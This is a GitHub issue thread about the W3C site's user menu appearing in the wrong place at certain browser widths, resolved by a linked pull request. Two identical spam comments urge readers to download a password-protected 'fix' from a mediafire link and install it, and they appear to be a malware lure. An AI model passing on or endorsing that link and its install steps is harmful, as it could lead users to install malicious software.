### ISSUE TITLE
User menu in wrong location at certain viewport widths

### ISSUE THREAD

**Issue by gosko** [w3c/w3c-website#653]
When I slowly resize my desktop browser window to make it narrower, the 'My account' menu jumps to the left of the Standards menu just before the styles adapt themselves to a narrower width by getting collapsed up into the hamburger menu.

<img width="1172" alt="Screenshot 2024-08-26 at 9 21 37 PM" src="https://github.com/user-attachments/assets/8bc80f59-b21e-408c-a62d-308fedd0e179">
<img width="1126" alt="Screenshot 2024-08-26 at 9 22 00 PM" src="https://github.com/user-attachments/assets/2c262a2d-c9a9-4cf6-8946-14e14ca10f81">
<img width="1111" alt="Screenshot 2024-08-26 at 9 22 26 PM" src="https://github.com/user-attachments/assets/edcbf78e-5733-42f3-ae87-ff7fe61e3810">

This only happens when signed in, and happens in both Firefox and Chrome on MacOS.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NicolaSaunders** [comment]
Proposed solution can be found at https://github.com/w3c/w3c-website-templates-bundle/pull/156

**Comment by jean-gui** [comment]
Deployed. @gosko Can you confirm that the issue is now resolved?

**Comment by gosko** [comment]
Yes, now resolved. Thanks!
